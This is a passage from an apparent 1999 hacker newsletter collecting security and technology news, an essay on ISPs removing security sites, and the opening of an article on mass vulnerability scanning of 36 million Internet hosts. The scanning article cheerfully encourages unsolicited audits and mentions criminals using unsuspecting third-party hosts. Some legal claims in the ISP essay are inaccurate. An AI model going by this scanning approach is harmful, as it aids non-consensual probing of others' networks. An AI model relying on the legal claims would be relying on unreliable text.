in-depth look at the 20th century. By VICKI SMITH CLARKSBURG, W.Va. (August 10, 1999 6:58 a.m. EDT http://www.nandotimes.com) - A $640 million electronic database of fingerprints will help police nationwide decide within two hours whether a suspect should be freed on bail or held in custody, FBI officials say. Instead of waiting more than 20 days for critical information, judges and law enforcement agencies in 15 states now can uncover a suspect's identity and criminal history before leaving the courthouse. All 50 states are expected to be connected within the next few years. The new Integrated Automated Fingerprint Identification System, which began operating July 28, was expected to be dedicated by FBI Director Louis Freeh on Wednesday at the FBI's Criminal Justice Information Services center in Clarksburg. It reduces to electronic data some 34 million fingerprint cards, the equivalent of 18 stacks as tall as New York's Empire State Building. It also slashes the wait for civil background checks from more than three months to just 24 hours, said James DeSarno, assistant director in charge of the Criminal Justice Information Services Division. @HWA 23.0 45 Named as Enemies of the Internet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by deepquest 45 nations have been named Enemies of the Internet by Reporters Sans Frontieres (RSF). The report lists countries it claims have blocked, filtered or all-out banned sections of the Internet. Some of the countries mentioned in the report where Azerbaijan, Kazakhstan, Burma, China, Cuba, Iran, Iraq, Libya, North Korea, Saudi Arabia, Sudan, Syria, Tunisia and Vietnam. Yahoo Asia News http://asia.yahoo.com/headlines/100899/technology/934254300-134601.html PARIS, FRANCE, 1999 AUG 9 (NB)
By Martyn Williams, Newsbytes. new report by Reporters Sans Frontieres (RSF) has named 45 nations the group considers enemies of the Internet for the blocking and filtering or all-out banning the nations impose on Internet access. Of the 45 nations, RSF said 20 can be described as real enemies of the Internet for their actions. They are: the countries of Central Asia and the Caucasus (Azerbaijan, Kazakhstan, Kirghizia, Tajikistan, Turkmenistan and Uzbekistan), Belarus, Burma, China, Cuba, Iran, Iraq, Libya, North Korea, Saudi Arabia, Sierra Leone, Sudan, Syria, Tunisia and Vietnam. Many of the 20 nations are singled out for restrictions that make all Internet users access the network through a single, state-run ISP. These nations include Belarus, the nations of Central Asia, Sudan and Tunisia. China was singled out for its close monitoring of Internet use despite the rapid pace with which Internet use is growing. RSF singled out the case of computer technician Lin Hai, who was jailed for supplying Chinese e-mail addresses to a US-based dissident site that publishes an e-mail newsletter critical of the government, and the June closure of 300 unlicensed cybercafes in Shanghai. The group also highlighted China's periodic blocking of the Websites of dissident organizations and international news organizations including BBC Online and New Century Net. Other nations were taken to task for government-controlled filtering of the Internet which means, according to RSF, medical students in Iran are unable to access Websites dealing with anatomy and surfing via any of Saudi Arabia's private ISPs run through government filters that seek to maintain Islamic values. However, the situation is even worse in other countries. In Burma, said RSF, Internet access is via a state-run ISP and anyone who owns a computer must declare it to the government or face the possibility of a 15 jail sentence if the machine is discovered. Restrictions in Vietnam mean all Internet use has to be approved by the government through permits from the interior ministry and access via state-run ISPs. Journalists working for an online newspaper in Sierra Leone have been attacked, said RSF, with two from the daily The Independent Observer being arrested in June after accusations that they were working with the foreign based online newspaper Ninjas. And citizens of Iraq, Libya, North Korea and Syria have no direct access to the Internet and even the official sites of the governments of these countries are maintained on servers overseas. In the case of Iraq, the few official servers are in Jordan while the North Korean news agency maintains its site from Tokyo. Concluding its report, RSF called on the governments of the 20 nations to abolish the state monopoly on Internet access, the obligation on citizens to register before obtaining access, censorship through the use of filters, to lift controls on e-mail and enable more privacy online and to call off Internet-related legal proceedings. It also called on Burma, China, Cuba, Kazakhstan, Saudi Arabia and Tajikistan to ratify and enforce the International Covenant on Civil and Political Rights, Article 19 of which stipulates that "everyone shall have the right (...) to receive and impart information and ideas of all kinds, regardless of frontiers (...)".

The covenant has been signed by a number of the 20 nations singled out in the report and RSF asked those countries to respect the contents of Article 19. Those countries include Azerbaijan, Belarus, Iran, Iraq, Kazakhstan, Kirghizia, Libya, North Korea, Uzbekistan, Sierra Leone, Sudan, Syria, Tunisia and Vietnam. @HWA 24.0 Alliance Z3 Defaces Spanish Web Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lionel Yesterday (Wednesday), a group known as 'Alliance Z3', defaced the Spanish presidency's web site and left comments critical of the government. A government spokesperson admitted that the site was broken into, and that the original page has been restored. Yahoo News - French http://www.yahoo.fr/actualite/19990811/multimedia/934372020-yaho193.110899.134747.html 25.0 Government has a Hard Time with Bureaucracy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench A little intrigue, some misdirected governments funds, just what has been going on with government network security anyway? FIDNet has been proposed but is now facing opposition, which looks very similar to what happened with Defensewide Information Systems Security Program (DISSP) back in 1996. So what happened? Where did the money go? Then last year there was Defensewide Information Assurance Program (DIAP) which also failed. Now FIDNet looks like it to will fail. Just what the hell is going on? Network World Fusion - Registration May be Required (It's worth it though) http://www.nwfusion.com/cgi-bin/go2.cgi?url=/news/1999/0802feat.html&uid=656d61696c (I hate subscription services) 26.0 Law Not a Substitute for Good Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench Former federal prosecutor, Mark Rasch, says that while current cybercrime laws are extremely broad and could possibly be interpreted in such a way that makes most internet users criminals, businesses should still invest heavily on network security. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2312779,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Never a cop when you need one By David Raikow, Sm@rt Reseller August 11, 1999 10:46 AM PT URL: http://www.zdnet.com:80/zdnn/stories/news/0,4586,2312779,00.html In his keynote address at the WebSec security conference on Tuesday, former federal prosecutor Mark Rasch outlined one more rationale for a robust and comprehensive corporate security policy. If you're not prepared to respond to a system intrusion entirely in-house, you may be even less ready to deal with the consequences of going to the authorities for help, he warned. Rasch, who was responsible for the prosecution of Robert Morris and the investigations of Kevin Mitnick and the "Cuckoo's Egg" hackers, described a legal system struggling to keep up with new technology and failing. In an attempt to address threats real and perceived, Congress has passed extraordinarily broad cybercrime laws, giving prosecutors enormous discretion, Rasch claimed. We're all felons "We have enacted new statutes that make felons of us all," said Rasch. "If you've e-mailed your cousin from the office, you're probably a felon." While law enforcement agencies aren't likely to bother with the average violation of corporate e-mail policy, their priorities are no more likely to match most users'. Most IS shops probably would hope to chase intruders off as quickly and quietly as possible while minimizing the damages. But the FBI, according to Rasch, is probably more interested in a high-profile conviction and may want to prolong an intrusion in order to collect evidence. The legal impact of a security breach may fall even more heavily on corporations than on the guilty party. An intruder using a company's servers to strike at other machines, for example, could leave that company exposed to "downstream liability" in civil court. And certainly a solvent corporation will present a more attractive defendant in such cases than the average cracker, he said. Rasch laid out a situation in which an employee had used corporate servers to acquire and distribute pirated software. The business, which had unknowingly been using some of this software, was potentially subject to millions of dollars in fines. Law is a 'blunt instrument' Rasch emphasized that it may be essential to notify the authorities after a breach, particularly as it may be required by law. Government agencies also have assets--subpoena powers, investigative resources--that may be necessary to adequately respond to an attack. The key is to have an established plan for addressing these concerns so that employees are not forced to make ad-hoc decisions in the heat of the moment, he said. "Law is a blunt instrument to use against cybercrime," Rasch concluded, "You should know what you're doing before you try." @HWA 27.0 Network-centric Warfare to be Used by Military ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid The San Jose Mercury News has an interesting interview with Vice Adm. Arthur K. Cebrowski, president of the Naval War College in Newport, R.I., on what he describes as network-centric warfare and how the armed forces are adapting to it. San Jose Mercury News http://www.sjmercury.com/svtech/news/indepth/docs/qa081199.htm Posted at 10:29 p.m. PDT Tuesday, August 10, 1999 Armed forces are adapting to network-centric warfare Vice Adm. Arthur K. Cebrowski, described as the U.S. Navy's computer guru, is president of the Naval War College in Newport, R.I., and instrumental in addressing military needs in the information age. Cebrowski outlined his ideas on network-centric warfare, which aims to link the Navy's resources -- from personnel to weapons -- through a computer network, Tuesday at the Naval Postgraduate School in Monterey. Prior to the speech, Cebrowski spoke with Mercury News Staff Writer Shashank Bengali. This is an edited transcript of their conversation: Q Where did the concept of network-centric warfare come from? A - It is the military's response to the information age. We can have well-informed soldiers and sailors and marines out there in the field but operating according to military principles that help organize their behavior. Forces will self-synchronize themselves from the bottom up, attaining a degree of efficiency and effectiveness that hasn't been possible before. Q - And you're able to coordinate forces over wide geographic areas as well? A - Yes. Just as in the information age, technology has changed the importance of territory and geography, you find the same thing in the military enterprise. That's why you see so much these days about striking targets from widely dispersed forces. So network-centric warfare derives its power from well-informed but geographically dispersed forces that have a high degree of shared awareness. Q - Do you think the military has lagged behind the rest of the world in implementing networking technology? A - There's a famous old Roman saying that the military walks in step with society but several paces back. And part of that is because the military is responsible for securing the most fundamental interests of the state; that is, the security of the people. And consequently, it tends to be strategically risk-averse. So before the military will make a dramatic shift, it will look for some very good evidence. We believe that that evidence is not only at hand, but that it's obvious, and the military is making that adjustment. Q - How much will you have to overhaul, or at least, shift, your personnel to accommodate these changes? A - One of the things that happens when there's a shift as great as this is that different skills are valued in different ways. And what you're seeing is a revaluing upward of those personnel who have facility in information tech broadly, both on the communication and executing side. It's also true in information-gathering, or what we call the ``sensing'' side. This is not just in war fighting, but it extends to everything we do. The secretary of the Navy divides its concerns into three areas: how we live, how we work and how we fight. We've been vigorously applying it at all three of those levels. Q - Give a few examples of how this has affected how you fight. A - Well, we've spent a considerable amount of money on what we call the IT21 program, Information Technology for the 21st century. What it is, is high-quality information exchange capability that is in our combat ships. We use it for the exchange of vital warfare information. If you look at how the operations were run in Kosovo, we don't have high-level meetings anymore, what we have is high-level collaborations with people at dispersed locations. The IT21 program allows us to do that from ships at sea. At the tactical level, we share information to bring combat power to bear via very high-quality data links, and that's the system by which we commit weapons and move forces. Q - How much has all this cost? A - It's been expensive (more than $1 billion over the last few years). However, the return on the investment has been enormous. And of course we don't measure return on investment the way stockholders do, we measure it in terms of increased combat power, and that's become very obvious to us. Q - What have been the changes in the third aspect, the way you live? A - We have wonderful experiences from our sailors deployed around the world, gone from home for extended periods of time, and now they are connected to their families on a daily basis. You have mitigated the great sense of loneliness. And, in fact, we've found that the retention rates among our sailors who are deployed in this modern technological environment are in fact higher than in the ships where we haven't been able to implement that kind of environment yet. Q - What kind of access do the sailors have to the technology? A - A few years ago, we deployed our first ship that had the capability of sending e-mail. We were so excited about that, that we actually counted the number of e-mails sent, and the number grew into the thousands. The Enterprise battle group recently returned from a long deployment, and they stopped counting e-mails past 5 million. It's no longer considered a novelty, it's just a fact of life. Q - How far along are you in implementing this across the Navy? A - By the end of 2001, we will have implemented the Navy-Marine Corps intranet. By the end of 2003, all of the ships in the Navy will have a very robust IT capability. Q - How did the previous system compare to what you're trying to put in now? A - It's not even a matter of saying it was a system. What you really had was a collection of capabilities that lacked standardization, interoperability, capacity. For example, one of the great concerns in combat is what's euphemistically called ``friendly fire'' (when an armed force accidentally kills one of its own). Of course, we don't like friendly fire. And information technology in the form of modern tactical data links (is) one of the most important tools to suppressing friendly fire. That's just one of the places where in our studies and in our war games, we can see the payoffs of information technology. Q - How much have things changed since the last all-out war in the Persian Gulf? A - The Persian Gulf War, looking back, quite frankly looks quite a bit like the Stone Age. I was commanding the USS Midway, where we had two telephones with off-ship capability. And it's hard to imagine that today. Some of our aircraft carriers have a thousand seats (for communicating). The quality of planning can go up a great deal, and you can plan much faster. For example, to put together a plan for fleet movement, a major evolution would frequently take a day or two. Now that kind of planning is done in an hour or even less. It's no longer plan, then execute -- it's plan while executing. Q - And the billion-dollar question: Are these systems ready for Y2K? A - I don't think we'll have a hiccup in Y2K as far as military systems. Contact Shashank Bengali at sbengali@sjmercury.com or (408) 920-5066. @HWA 28.0 Gateway plans for Amiga ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by M1r0rB4lls Gateway is finnally doing something with the 47 Amiga patents it bought several years ago. They aren't planning on introducing a new PC but instead want to use the technology to create info appliances. MSNBC http://www.msnbc.com/news/299752.asp Gateway to revive Amiga for information appliances By Gary McWilliams THE WALL STREET JOURNAL Aug. 12 — Two years ago, PC maker Gateway Inc. acquired the rights to the personal-computer industry’s most famous cult product, the Amiga PC. The Amiga made its debut in 1985, and still has fans, partly as a result of a James Dean-like history: a rapid rise, then a tragic end. GATEWAY PAID ABOUT $13 MILLION for 47 Amiga patents, including those for important multimedia techniques. The San Diego PC maker’s original plan was to use the patents as a bargaining chip in royalty negotiations with other PC makers. “It was a treasure chest,” says Joe Torre, a former Amiga Inc. hardware engineer. Now, Gateway is aiming to revive the Amiga in a bold move to set standards for the next era in computing. It quietly has set up and staffed a new Amiga Inc. subsidiary to cobble together low-cost “information appliances” for the Internet, based on Amiga technology, that can be linked like home-stereo components to add features. “There’s a new computer revolution on the horizon that has to do with making computers a natural part of everyday life,” says James Collas, the Amiga unit’s president and a former Gateway executive. He says the unit will craft everything from digital-music players and game machines to wireless tablets that link to the Internet. Its first products could arrive early next year and be priced from about $100 for game players to $1,000 for PC servers. Gateway will pit its tiny subsidiary against PC kingpins such as Microsoft Corp. and consumer-electronics companies such as Sony Corp. and Philips Electronics NV, which also are developing new-age information devices. Mr. Collas says Amiga will license its designs to consumer-electronics makers to promote technologies that can be embraced far beyond its parent. It could use all the help he can muster. Early entrants in the computer-consumer electronics convergence market, such as WebTV, were gobbled up quickly by the giants (Microsoft bought WebTV). Even for a company with $7.5 billion in sales, the risks are high for Gateway. “It’s becoming a battle for the big boys,” says Sean Kaldor, a researcher at International Data Corp. How much of the new Amiga will come from its past isn’t known. Mr. Collas has recruited designers from Amiga’s heyday along with software specialists from Silicon Graphics Inc. and Apple Computer Inc. Amiga, he says, will operate independently from its parent, and be free to strike its own agreements. Mr. Collas wouldn’t say if Gateway plans to spin off the subsidiary. A Gateway spokesman declined to comment. Among the San Diego division’s first products will be a new Amiga PC that Mr. Collas says is aimed to bring Amiga PC software writers back into the fold. Next week, the company plans to release a new version of the Amiga operating system that provides access to the Internet. The Amiga is nothing if not resilient. It first appeared 14 years ago as a spunky alternative to the IBM PC and Apple’s Macintosh. Graphics and film enthusiasts flocked to the machine because of its ability to handle video and sound. Commodore Electronics Ltd. sold five million of the low-cost machines before the company’s sudden demise. Even today, Hollywood animators and filmmakers still use the machines for generating special effects. Amiga went into decline after Commodore filed for bankruptcy in 1994, and stopped making the machines. The first attempt to resurrect Amiga came in 1995, when German computer maker Escom AG acquired the Commodore patents in a bidding contest with Dell Computer Corp. But, like Commodore, Escom filed for bankruptcy a year later, and manufacturing was halted again. Amiga devotees became scavengers, scouring online bulletin boards for used machines and add-on parts. Indeed, there are dozens of tiny companies still living off the Amiga accessory market. If the new Amiga ever catches on, it will be an Amiga in name only for some of the machine’s original devotees. Greg Scott, an Amiga fan who manages the computer systems for Archtech Inc., a computer firm in London, Ontario, says Gateway’s plan to develop the next-generation Amiga PC using the free Linux operating software has raised the hackles of fans of the old Amiga. “It’s nothing new,” he says. Jason Compton, who owns an Amiga and once ran an online Amiga magazine, still believes nothing can match the original. “I’ve never seen a PC I’ve enjoyed more.” He says the Gateway plan does little more than resurrect the Amiga name. “As far as I can tell, there’s no connection” to the original technology, he says. Mr. Collas says such qualms are missing the spirit of the old Amiga. It isn’t new technology that’s needed so much as an innovative blending of existing technologies, he insists. Just as the Amiga PC’s low cost and ease of use allowed owners to do multimedia work years ahead of the IBM PC, he says the new Amiga “will bring the information age to the common person.” Copyright © 1999 Dow Jones & Company, Inc. All Rights Reserved. @HWA 29.0 Mitnick Moved to County Jail ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by ryan In a swiftly executed move Kevin Mitnick has been moved from the Metropolitan Detention Center - Los Angeles, to the San Bernardino County Jail. Unfortunately the SBC does not offer Kosher meals, since Kevin wishes to exercise his right to freedom of religion he has not eaten since his transfer late Wednesday afternoon. The defense lawyers will file a motion with the court for Kevin's immediate return to MDC-L.A. The SBC does allow visitors as long as 24 hours notice is given. FREE KEVIN http://www.freekevin.com @HWA 30.0 The problem with ISP's and security sites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by CyberChrist A simple email and a site disappears, maybe it was never there to begin with? ISPs with missing back bones, maybe they never had them? What is going on? Where have all the good security sites gone? Buffer Overflow http://www.hackernews.com/orig/buffero.html Not found-- the problem with ISPs and security web sites CyberChrist cc@h0use.org "Sapere Aude" Over the last few months, there have been a rash of security-related web sites taken offline for a peculiar reason-- It seems that Internet Service Providers cave in to the demands of people objecting to the content of the site, or at times, the alledged content. Sites such as Packetstorm Security have been victim of people claiming that material that is posted on the web site is libelous and try to hold the service provider of the web site, such as the web hosting organization, for ransom by threatening them with lawsuits if they do not force the webmaster to change the content. Companies are more willing to just toss the offending site off of its servers and avoid any kind of threat of a lawsuit. However, this is not the way to deal with this problem, as there have been precedents set in American courts that deal specifically with these issues. First, let's examine a bit as to how a "security expert" or a "hacker" is viewed by a typical ISP. Most ISPs have a service agreement, where one agrees to abide by their rules. These rules often lay out the rules as to what content is acceptable and not acceptable. Many of these ISPs forbid the posting of security information on their web servers, lumping "hacking" in with "pornography" and other perceived underground activities. This lumping of hacking with other, seedier activities is prevalent and is part of the problem. No matter what the credentials are of the person that is constructing the web site and no matter what his stated intentions are, and no matter how many disclaimers are posted on the site, web hosting companies and ISPs generally frown upon that kind of content. So part of the problem is that ISPs and web hosting companies are generally undereducated about the entire hacker culture, their brains fattened by the massive FUD articles posted in the media. In their minds, security consultants==hackers=bad. This leads to another problem-- there is always going to be someone out there that is jealous or mad about the content of another web site. The site may contain information such as "xyz said this and xyz is wrong and this is why." Sites such as these either start posting about each other, or worse, one webmaster just gets fed up with it and contacts someone that they feel can remedy the situation. Often this person forgets about the chain of command as far as reporting questionable material and goes straight for the throat by contacting the web site's upstream provider. This is becoming an increasing problem and the problem again lies in the fact that many of these fly-by-night web masters were not around during the infancy of the Internet (no, that does not mean that the infancy was when then web got started). There ARE rules of engagement and chains of command, and these have been outlined since the early 80s and perhaps beyond, both in the form of RFCs and tradition. The way that complaints used to be handled are roughly as follows: - send email to the system administrator of the offending system, calmly explaining the situation and maybe offer some evidence as to how this is causing harm. This could be due to content or due to other activity coming from the site, such as port scanning. Attaching logs usually helps a lot. - if you don't get a response in a reasonable amount of time, try re-sending the email. It may seem hard to believe, but sometimes mail gets lost. - if there is still no response, try doing a 'whois' on their domain name, and then try contacting them via the information provided. Usually you get names and telephone numbers and addresses at this point. - it is only when you have exhausted all of these measures and are getting no cooperation or hostile responses that you try to contact the upstream service provider. To find out who their upstream service provider is, try looking at the nameservers that are registered for the domain in the 'whois' command or try doing a traceroute and seeing who they have their connection from. This is really common sense more than anything. Common sense apparently has gone out the window in the point-and-click world of the 1990s. The last part of the puzzle is what happens when these two uneducated sides get together to decide what to do about someone that seems to know more than they do. More often than not, what happens is the illogical in that the offending party is tossed off the system or his upstream provider threatens to shut down the service. The cycle usually goes like this: - siteA.com posts information that shows that information by lamerA is wrong. siteA.com pokes fun at him, generally ridicules him, and the cycle usually renews itself when lamerA says something else stupid (or publishes an idiotic book). - lamerA feels stung by all these statements and usually responds with weak defenses. Finally, the whole thing becomes unbearable and in the search of trying to get the activity to stop, he dashes to siteA.com's service provider and tells them that siteA.com has libelous material. lamerA threatens the service provider with a lawsuit or thereabouts. - siteA.com's provider panicks, as they do not wish to be sued for libel (awards for this are usually extravagant and ISPs barely break even as it is). So they either remove the site or forcibly remove the content and sends stern rebukes to siteA.com's administrator/user. There are a lot of problems with this cycle. Obviously the chain of command is broken. But more importantly, due to lack of education on the ISP's part, they are not aware that U.S. courts have decided that ISPs are NOT liable for the content of its users. In November of 1998, The United States Court of Appeals in Florida ruled against a woman who sued America Online when one of its subscribers, a convicted sex offender, approached her 11-year-old son via an America Online chat group. The appeals court upheld a federal law that protects Internet service providers and online services from inappropriate online transmittals by subscribers. The verdict is being appealed to the United States Supreme Court. This decision also extends to web content. Rather than cite the case to the accuser, the service provider usually caves in quickly and pulls the plug. There are many other cases that ISPs can cite in their defense. Zeran vs. America Online in 1998 was upheld by the U.S. Supreme Court. It stated simply that ISPs such as America Online are free from liabilitynover material that is carried on their network. Furthermore, the Supreme Court stated that ISPs do not have a duty nor an obligation to remove material found to be offensive. The decision cited the Communications Decency Act of 1996, where ISPs are shown not to be publishers and thus are not treated as such by the law. Another case is Cubby vs. Compuserve. In this case, the ruling cleared CompuServe of any wrongdoing based on the content of one of its subscribers, stating that ISPs such as CompuServe are secondary publishers, merely providing the means by which documents may be viewed and had no editorial control over any of the content published on its public web servers. At the most, it removes any kind of offensive material after conplaints. Hence, it cannot be held liable for content since it had no previous knowledge of the content. Interestingly enough, one of the key elements that can help protect security consultants from being run off from a service provider or that can help a service provider to deal with complaints is the Communications Decency Act of 1996. It contains clear language that clearly states that "no provider or user of an interactive computer service shall be treated as a publisher or speaker of any information provided by another." The key is to realize that as a service provider being threatened with lawsuits over content that is found to be defamatory, your company is NOT liable for the content being published by one of your users. That is the law of the land and by citing these cases to any irate callers, you may be able to diffuse the situation in a more diplomatic manner than just booting the offending site off your server or off your router. Remember that these laws also theoretically work in inverse-- if you boot users from your system without warning and you state that the material could get the ISP sued, you could be sued by the user you just booted for wrongful termination. And if the user can show loss of business over this wrongful termination, the ISP could have more problems in its hands than it bargained for. I should be noticed that although ISPs cannot be held liable, users of the system that are publishing the questionable information CAN be held liable. However, a clear case must be made in court to show that the information is erroneous and has caused emotional and financial distress to the plaintiff. In conclusion, it has been shown that the problems that arise in today's trend of booting "questionable" security sites from servers or from routers arises mainly from a complete lack of education on all sides as to the way that these problems are to be approached. The problems are not only in the complete diregard of the chain-of-command in reporting a problem, but ultimately also lies in the total lack of education on the part of the ISP in knowing what its rights are as defined by the American Judicial System. ISPs of any kind seem quick to cave in to the demands of an irate complaint and do not seem to fully think of the situation at hand and think of the legal precedents of these kinds of complaints without executing a rash decision that does nothing but give other would-be-complainers hope that they can also get a web site or web server removed if they complain long enough to their provider. If the rash of sites being taken down by these uneducated people is to stop, then all sides need to be aware of the protocols that are involved in dealing with these problems and the legal cases that support their decisions. -- CyberChrist cc@h0use.org "Sapere Aude" @HWA 31.0 The Internet Auditing Project ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Aleph One Security Focus has posted a very interesting report in their guest forum section. The folks at SSR went and scanned 36 million IPs, that was about 85% of the internet at the time, for 18 common security vulnerabilities. They came up with some rather scary results. The article also introduces the idea of the International Digital Defense Network (IDDN), a possible public interest project which, if implemented, could dramatically influence the security of the Internet. This is a must read for anyone even remotely interesting in system security. Security Focus http://www.securityfocus.com/templates/forum_message.html?forum=2&head=32&id=32 The Internet Auditing Project by Liraz Siri Wed Aug 11 1999 Download the BASS scanner source code. Introduction Today, when too many people think of security on the Internet, they think of individual hosts and networks. Alone. Got a problem? Damn! Must be those damn hacker punks. Again. Keep it to yourself. Call the Feds, call the New York Times. Make sure we don't get it. Didn't keep your systems patched? Moron. Don't make us sue you. With the growing irrelevance of security organizations like CERT and law enforcement on the Internet, an ever growing number of attacks are handled in isolation. Hundreds of millions of Internet users around the world have become accustomed to an Internet beyond boundaries. One site flows to the next, a jungle of software, protocols, media and people connecting, signal, noise, mixing, evolving, together. It seems silly to ignore the security of the system _as a whole_, but we still do. A helpful analogy might be to consider the Internet more a living organism than a neighborhood. A security compromise is can behave more like a disease then a "break-in". It is often contagious and can spread. Remotely exploitable security vulnerabilities are like the natural wounds of the skin. They are relatively rare, sometimes difficult to squirm through, but once inside, infection can begin. This article describes the efforts of a small, independent, security research group to audit some 36 million hosts connected to the Internet, for commonly known security vulnerabilities in an unfocused low-res scan. Why? Because we're a curious bunch, because we've been speculating (rather academicly) over the results for several years, and of course, because we can. Why are we publishing now, Why haven't we published before? We know other groups, working for everyone from the UKUSA SIGINT agencies, foreign intelligence, private corporations and organized crime are not likely, for many obvious reasons, to disclose any "privileged information" to the general public. We feel this is not A Good Thing, and would like to do what we can to help level the playing field. We don't have any money, resources or academic prestige to back us up, but we do have a few, humble insights to share, and we hope these can speak for themselves. Besides, wouldn't it be a shame to keep all of our busy work to ourselves, when it could be reaching a much wider audience, spark debate, and maybe even making a difference? Up until now, a couple of issues have held us back. First of all, the timeless responsibility factor. We could not avoid the possibility (certainty?) that our work would be abused by malicious parties and we've all seen before how easy it is for people to point the finger. Secondly, we've been busy and publishing involves a significant investment in time writing articles, cleaning code, reaching the potential audience and reading (sometimes answering) endless e-mails. Walk forth in dread So you want to scan the millions of computers on the Internet from Japan to Egypt to Florida? Reach out and audit the networks of Internet Service Providers, corporations, universities, government facilities, banks and sensitive military installations? First, take another moment to think about it. Many people get nervous on the receiving end of an uninvited security audit, and you'll eventually step on quite a few toes. In some countries, you can even expect unpleasant house-calls from local law enforcement which will brand you a criminal for your unusual efforts. Citizens of a large democracy with many three letter agencies should be aware that a fully-equipped SWAT team is likely to tag along. While this may deter, possibly comfort law-abiding readers, a criminally inclined party is not without it's options. Resources are abundant on the Internet, and many suitable, unsuspecting, high-bandwidth volunteers are not hard to find, with the modest help of your favorite bulk auditing software. Not intimidated? That's the spirit! Quick & Dirty Overview Let's take a look at some of the basic ingredients we're going to need: 1.Some wheels. (BASS, a Bulk Auditing Security Scanner) 2.A map. (address search space) 3.Fuel. (resources) Although they are not required, logistical management skills, competence and patience can also come in real handy. Wheels The Internet is getting rather big these days, and exploring it's tens of millions of unique hosts is by no means an easy task. Manually, we could never get the job done. Fortunately, we can let a computer (or several) do most of the dirty work, allowing us to concentrate on coordination and management. Assuming of course, we have the right software. In this case, we're going to need a robust bulk security scanner that can monotonicly run for weeks, even months at a time, efficiently processing millions of addresses, generating gigabytes of traffic and surviving everything from broken routing, to system shutdowns and unfriendly sysadmins. Since we've never liked re-inventing the wheel, the first thing we did, (circa Sep 1998) was take a look at existing scanning software. We were disappointed. There was no shortage of software, from Satan, to Nessus, with a jungle of (often silly) cracker tools in between, but none of them would do. Nessus was impressive, but clearly not designed with bulk in mind. Most of the rest were unreliable, poorly written, slow and inextensible. Primitive, specialized scanners (foobar-scan) were also common, and equally useless. So, it looked like we'd need to write "Yet Another Security Scanner" ourselves. During development, we were careful not to complicate the design and code any more then we had to, aware of the many virtues of simplicity (especially in security software). Our goal was producing a scanner which was reliable, efficient and extensible. After a several weeks of on-off programming, the first alpha version of BASS, the Bulk Auditing Security Scanner was ready for it's first test run. Israel was the first target in a series of trials. At this point (Sep-Oct 98) BASS could only identify 4 common security vulnerabilities, but adding more later was a simple matter. What we really needed to evaluate was how well the multi-threaded scanning architecture worked. "beware the bugs that bite beta programs" It didn't. Even with a small target like Israel, the scan came to a final halt after about 18,000 addresses. It seemed threads would occasionally freeze, waiting for service from a host they knew was online, but behind a misconfigured firewall, or a broken router. The frozen threads were rare but persistent. They would build up in BASS's scheduler over time, eventually choking the scanner to a grinding halt. A fail-safe timeout circuit fixed the problem, and we tried again. This time, the scan finished on schedule. 110,000 addresses in under 4 hours, on a dual ISDN 128k connection. We selected the United Kingdom, with an address space of 1.4 million, for our next trial. If there were any further bugs, they were going to show, and they did. Around a million UK addresses later, BASS broke down and was dragging the entire system down with it. This time, several obscure memory leaks had slowly inflated BASS to monstrous proportions, consuming all available system memory. Several further painful debugging sessions were needed to bring the scanner up to par, during which 5 million addresses around the world had been scanned. Now that the architecture was stable, we proceeded to familiarizing BASS with the wonders of CGI and RPC, allowing the scanner to test for up to 18 widely known security vulnerabilities (see detailed listing in suffix item 1). The tests were designed to reduce false positives and false negatives to a minimum, combining passive (server's version header) and interactive (server's response to ill-formed input: a buffer-overflow, sneaky characters) implementation signatures to determine vulnerability. So now we could sit back, feed BASS a really big map of the Internet, and wait a few months (or weeks, depending on our resources) for results. Download the BASS scanner source code. A map. - A map you say? Yeah, well what I really mean is a really long list of "all" the computers connected to the Internet. Please note the term "all" is used loosely ("most" or the "majority" would probably be more accurate). - How many of them are there anyway? Reader, that's a tougher question then you might think. An Internet Protocol address, or IP for short, is a 32 bit integer. This means are there 2^32 (4.3 billion) possible unique IPs, the IP address space. In practice, only a very small fraction of this space is really used. Due to the anarchic nature of the Internet, nobody has any exact figures on usage statistics, but most estimates (circa Jan 1999) settle around 100 million users worldwide. The number of computers online is more around an order of a magnitude lower (15 million). This is because most users still access the Internet dynamicly, by dialup, over phone lines. ISPs (Internet Service Providers) can often manage to provide service with an address pool 4 to 10 times smaller then their customer base. Ideally, since BASS is (currently) Unix oriented, we would like to eliminate any non-unix computers (not that non-unix's are any more secure, quite the contrary) from our Really Big List. We would also want to skip any dynamic IP pools. In a perfect world, this would be a good idea. In ours, eliminating poor scanning candidates in advance would actually take longer then the scan itself. Optimizing a scan this way is only useful if you plan on repeating it frequently. - I'm confused, how many IPs are we going to end up scanning? That depends,.. In our case, we ended up scanning around 36 million IPs, which we estimates covered 85 percent of the active address space at the time. Keep in mind, however, that the Internet is growing very quickly, so these numbers will get bigger by the time you try this out yourself. Search for "Internet Surveys" on the web, and get an updated figure. - Wait, what's with the 85 percent? Calm down, mapping the entire used IP space is nearly impossible, even assuming you can agree with anyone else (try Usenet folks first!) on what "used" should mean. The main problem is using an IP is an internal decision organizations with an allocated slice of the address space makes for themselves. All those slices add up to 300 million IP addresses, of which only 5 percent have a computer at the other end, so we need to narrow down our search space. This is where the Domain Name System (DNS) comes to the rescue. The DNS is a tree structured lookup directory used (primarily) to map a hostname to an IP and vice-versa (www.nsa.gov <=> 208.212.172.33). By convention, most of the Internet's active addresses are registered with the DNS, although this is a not a mandatory requirement. - So we can just download the DNS's records from the Internet? Yes, and no. The DNS protocol has an "AXFR zone transfer" mechanism designed to allow one DNS server to mirror the contents of another, by requesting an AXFR zone transfer, you can download a server's records. This is helpful in providing for 